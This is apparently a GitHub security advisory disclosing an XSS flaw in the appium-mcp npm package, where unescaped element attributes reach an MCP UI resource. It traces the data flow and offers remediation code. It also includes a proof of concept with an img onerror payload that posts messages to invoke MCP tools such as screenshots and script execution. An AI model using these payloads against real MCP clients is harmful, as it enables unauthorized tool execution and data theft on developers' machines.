GHSA-x975-rgx4-5fh4

npm · appium-mcp

Summary

appium-mcp: Unescaped Locator Data XSS in MCP-UI Resource (createLocatorGeneratorUI)

Advisory details

Summary

appium-mcp's createLocatorGeneratorUI function interpolates attacker-controlled element attributes — text, content-desc, resource-id, and locator selector values — directly into an HTML template literal without any HTML or JavaScript context escaping. An attacker who controls the UI of the app under test can inject arbitrary HTML and JavaScript into the MCP UI resource returned by the generate_locators tool. When a victim's MCP client renders this resource, the injected script executes and can invoke arbitrary MCP tools via window.parent.postMessage, leading to unauthorized MCP tool execution such as taking screenshots, reading page source, or any other registered capability.

Details

The vulnerability is a stored/reflected cross-site scripting (XSS) issue in the MCP UI generation pipeline.

Vulnerable sink — src/ui/mcp-ui-utils.ts:730–740:

${element.text ? `<p class="element-text"><strong>Text:</strong> ${element.text}</p>` : ''}
${element.contentDesc ? `<p class="element-text"><strong>Content Desc:</strong> ${element.contentDesc}</p>` : ''}
${element.resourceId ? `<p class="element-text"><strong>Resource ID:</strong> <code>${element.resourceId}</code></p>` : ''}
<code class="selector">${selector}</code>
<button class="test-btn" onclick="testLocator('${strategy}', `${selector.replace(/`/g, '\\`')}`)">Test</button>

None of element.text, element.contentDesc, element.resourceId, selector, or strategy is HTML-escaped before insertion. The onclick attribute additionally embeds strategy and selector into inline JavaScript, escaping only the backticks in selector. That is insufficient: a double quote in selector ends the onclick attribute itself (HTML attribute breakout), and a single quote in strategy terminates the JavaScript string literal.
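To make the attribute breakout concrete, here is a minimal sketch that mirrors the escaping in the onclick line quoted above. The function names backtickEscape and renderButton are hypothetical and exist only for this illustration, and the marker value is deliberately harmless.

```typescript
// Hypothetical reproduction of the escaping applied in the quoted onclick line:
// only backticks in the selector are escaped.
function backtickEscape(selector: string): string {
  return selector.replace(/`/g, "\\`");
}

// Hypothetical stand-in for the button markup built by createLocatorGeneratorUI.
function renderButton(strategy: string, selector: string): string {
  return `<button class="test-btn" onclick="testLocator('${strategy}', \`${backtickEscape(selector)}\`)">Test</button>`;
}

// A harmless marker value. The double quote is left untouched, so it closes the
// onclick attribute early and the remainder is parsed as a separate attribute.
const selector = 'x" data-injected="1';
const html = renderButton("xpath", selector);

console.log(html);
console.log(html.includes(' data-injected="1')); // true
```

Because the value sits inside a double-quoted HTML attribute, the HTML parser sees the quote before any JavaScript is parsed, which is why escaping for the JavaScript context alone does not help.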

By contrast, createPageSourceInspectorUI at src/ui/mcp-ui-utils.ts:911–916 does apply escaping to the page source, confirming that the protection gap in createLocatorGeneratorUI is an oversight, not a design choice.

Complete data flow (source → sink):

  1. src/tools/test-generation/locators.ts:57 — getPageSource(driver) reads the page source XML from an active Appium session; the connected app is fully attacker-controlled.
  2. src/tools/test-generation/locators.ts:72 — the raw page source is passed to generateAllElementLocators.
  3. src/locators/source-parsing.ts:108 — XML attribute values undergo only newline replacement (attr.value.replace(/(\n)/gm, '\n')); HTML entities such as &lt; are decoded into raw < characters by the XML parser with no re-encoding.
  4. src/locators/generate-all-locators.ts:73–75 — element.attributes.text, ['content-desc'], and ['resource-id'] are copied verbatim into the locator result object.
  5. src/tools/test-generation/locators.ts:90 — the locator objects are passed to createLocatorGeneratorUI.
  6. src/ui/mcp-ui-utils.ts:730–740 — values are interpolated directly into the HTML response (sink).
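The key step in this flow is that entity-encoded attribute values come out of XML parsing as raw markup characters. The sketch below illustrates that effect only. decodeXmlEntities is a hypothetical stand-in for what an XML parser does to attribute values, not the parser appium-mcp uses, and the template string is copied from the sink shown earlier.

```typescript
// Hypothetical stand-in for the entity decoding an XML parser applies to
// attribute values. It is not the parser used by appium-mcp.
function decodeXmlEntities(raw: string): string {
  return raw
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&apos;/g, "'")
    .replace(/&amp;/g, "&"); // decoded last so "&amp;lt;" yields "&lt;", not "<"
}

// Attribute value as it appears in the page source XML.
const rawAttribute = "&lt;b&gt;xss-in-contentDesc&lt;/b&gt;";

// After parsing, the value contains live markup characters.
const parsed = decodeXmlEntities(rawAttribute);

// Interpolating it without re-encoding reproduces the behaviour of the sink.
const html = `<p class="element-text"><strong>Content Desc:</strong> ${parsed}</p>`;

console.log(parsed);
console.log(html);
```

The point of the sketch is that the encoding in the XML protects the XML document only. Once the value is decoded, it has to be encoded again for whatever context it is written into next.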

The window.parent.postMessage({type:'tool', payload:{toolName:...}}, '*') mechanism used throughout src/ui/mcp-ui-utils.ts:645–695 means any JavaScript executing in the rendered UI resource can invoke registered MCP tools unconditionally.
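The message shape above can be modelled as a type, which also shows what a receiving host would have to check before acting on it. The following is a sketch under stated assumptions: parseToolMessage, shouldDispatch, and the allowlist are hypothetical names that do not come from appium-mcp or any MCP host, and such a check would be defense in depth rather than a substitute for output escaping.

```typescript
// Message shape taken from the postMessage call described above.
interface ToolMessage {
  type: "tool";
  payload: { toolName: string; params: Record<string, unknown> };
}

// Hypothetical validator: returns a typed message, or null if the data does
// not have the expected shape.
function parseToolMessage(data: unknown): ToolMessage | null {
  if (typeof data !== "object" || data === null) return null;
  const msg = data as { type?: unknown; payload?: unknown };
  if (msg.type !== "tool" || typeof msg.payload !== "object" || msg.payload === null) {
    return null;
  }
  const payload = msg.payload as { toolName?: unknown; params?: unknown };
  if (typeof payload.toolName !== "string") return null;
  const params =
    typeof payload.params === "object" && payload.params !== null
      ? (payload.params as Record<string, unknown>)
      : {};
  return { type: "tool", payload: { toolName: payload.toolName, params } };
}

// Hypothetical policy: dispatch only tools that the UI resource is expected to call.
function shouldDispatch(data: unknown, allowed: ReadonlySet<string>): boolean {
  const msg = parseToolMessage(data);
  return msg !== null && allowed.has(msg.payload.toolName);
}

const allowed = new Set<string>(["generate_locators"]);
const injected = { type: "tool", payload: { toolName: "appium_screenshot", params: {} } };

console.log(shouldDispatch(injected, allowed)); // false
```

Without a check of this kind on the receiving side, every well-formed message is treated as a legitimate request, which is the behaviour the paragraph above describes.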

Remediation requires an HTML-escaping helper (replacing &, <, >, ", ') applied to all element properties in the HTML context, and JSON.stringify for values embedded inside JavaScript string literals in onclick handlers.
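A minimal sketch of that remediation follows. It is not the project's actual patch: escapeHtml, jsArg, LocatorElement, and renderElement are hypothetical names introduced here, and the markup is copied from the vulnerable snippet above. Note that a value placed inside an onclick attribute crosses two contexts, so it is serialized with JSON.stringify first and then HTML-escaped for the attribute.

```typescript
// Hypothetical helper: escapes the five characters named in the remediation.
const HTML_ESCAPES: Record<string, string> = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(value: unknown): string {
  return String(value ?? "").replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch] ?? ch);
}

// JavaScript context first (JSON.stringify), then the HTML attribute context.
function jsArg(value: string): string {
  return escapeHtml(JSON.stringify(value));
}

// Hypothetical shape of the element fields used by the template.
interface LocatorElement {
  text?: string;
  contentDesc?: string;
  resourceId?: string;
}

function renderElement(element: LocatorElement, strategy: string, selector: string): string {
  return [
    element.text ? `<p class="element-text"><strong>Text:</strong> ${escapeHtml(element.text)}</p>` : "",
    element.contentDesc ? `<p class="element-text"><strong>Content Desc:</strong> ${escapeHtml(element.contentDesc)}</p>` : "",
    element.resourceId ? `<p class="element-text"><strong>Resource ID:</strong> <code>${escapeHtml(element.resourceId)}</code></p>` : "",
    `<code class="selector">${escapeHtml(selector)}</code>`,
    `<button class="test-btn" onclick="testLocator(${jsArg(strategy)}, ${jsArg(selector)})">Test</button>`,
  ].join("\n");
}

const out = renderElement(
  { text: '<img src=x onerror="alert(1)">' },
  "xpath",
  "//*[@text='a\"b']",
);
console.log(out);
```

When the browser parses the attribute it decodes the entities back into a valid JSON string literal, so testLocator still receives the original strategy and selector values.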

PoC

Prerequisites:

  • appium-mcp v1.85.8 or v1.85.9 installed from npm
  • Node.js 20+ with the package built (npm install && npm run build)
  • An MCP client that renders HTML resources returned by generate_locators (e.g., VS Code with the Appium MCP extension, or any WebView-based MCP host)

Static confirmation (no Appium session required):

node --input-type=module <<'EOF'
import { generateAllElementLocators } from './dist/locators/generate-all-locators.js';
import { createLocatorGeneratorUI }   from './dist/ui/mcp-ui-utils.js';

const xml = `<hierarchy>
  <node class="android.widget.TextView"
        clickable="true"
        enabled="true"
        displayed="true"
        text="&lt;img src=x onerror=&quot;window.parent.postMessage({type:'tool',payload:{toolName:'appium_screenshot',params:{}}},'*')&quot;&gt;"
        content-desc="&lt;b&gt;xss-in-contentDesc&lt;/b&gt;"
        resource-id="com.attacker.app/&lt;u&gt;xss-resource-id&lt;/u&gt;"/>
</hierarchy>`;

const locators = generateAllElementLocators(xml, true, 'uiautomator2', { fetchableOnly: true });
const html     = createLocatorGeneratorUI(locators);

console.log('UNESCAPED <img src=x onerror= present:', html.includes('<img src=x onerror='));
console.log('UNESCAPED <b> in contentDesc present:  ', html.includes('<b>xss-in-contentDesc</b>'));
console.log('UNESCAPED <u> in resourceId present:   ', html.includes('<u>xss-resource-id</u>'));
EOF

Expected output:

UNESCAPED <img src=x onerror= present: true
UNESCAPED <b> in contentDesc present:   true
UNESCAPED <u> in resourceId present:    true

Dynamic confirmation (Docker, network-isolated):

# Build context is the parent directory (contains repo/ and vuln-001/)
docker build -t appium-mcp-vuln-001 \
  -f vuln-001/Dockerfile \
  reports/npmAI_303_appium__appium-mcp

docker run --rm --network none appium-mcp-vuln-001

The container output (excerpt) confirms:

HTML has unescaped <img src=x onerror= : true
Text paragraph  : <p class="element-text"><strong>Text:</strong> <img src=x onerror="window.parent.postMessage(...)"></p>
│  [PASS] XSS CONFIRMED                                       │
│  createLocatorGeneratorUI inserted the raw <img> XSS tag   │
│  execute the onerror handler, enabling arbitrary MCP tool   │

End-to-end exploitation against a real MCP client:

  1. Attacker publishes or sideloads an Android/iOS app whose UI element text, content-desc, or resource-id attributes contain an XSS payload (e.g., <img src=x onerror="window.parent.postMessage({type:'tool',payload:{toolName:'execute_script',params:{script:'fetch(...)'}}},'*')">).
  2. Victim developer connects their Appium MCP server to the attacker's app and calls the generate_locators MCP tool.
  3. The MCP client renders the returned HTML resource in a WebView / iframe.
  4. The injected onerror handler fires and posts a crafted tool message to the parent frame, causing the MCP host to invoke arbitrary registered tools (e.g., appium_screenshot, execute_script, get_page_source) without user confirmation.

Impact

This is a Cross-Site Scripting (XSS) vulnerability. Any developer using appium-mcp with an MCP client that renders HTML resources (the intended workflow for the UI feature) is impacted when they inspect elements from an attacker-controlled application.

Impact scenarios:

  • Arbitrary MCP tool invocation: Injected JavaScript calls window.parent.postMessage with any tool name and parameters, executing MCP tools silently (e.g., taking screenshots, reading page source, executing scripts on the device).
  • Credential and data exfiltration: Via execute_script or screenshot tools, an attacker can extract sensitive data visible on the device screen or in the page source.
  • Lateral movement / persistence: If the MCP host exposes file-system or shell tools, the attacker can escalate to arbitrary code execution on the developer's machine.
  • Supply-chain / CI abuse: Automated test pipelines that call generate_locators against third-party app builds are equally vulnerable; no human interaction beyond running the pipeline is required.

The attack requires no authentication (PR:N), and the tool is enabled by default (default-on: Y). The scope is changed (S:C) because the injected JavaScript, although it runs inside the rendered UI resource, reaches beyond that resource: its postMessage calls cause the MCP host to invoke tools.

Reproduction artifacts

Dockerfile

# VULN-001 PoC: Unescaped Locator Data XSS in appium-mcp create

References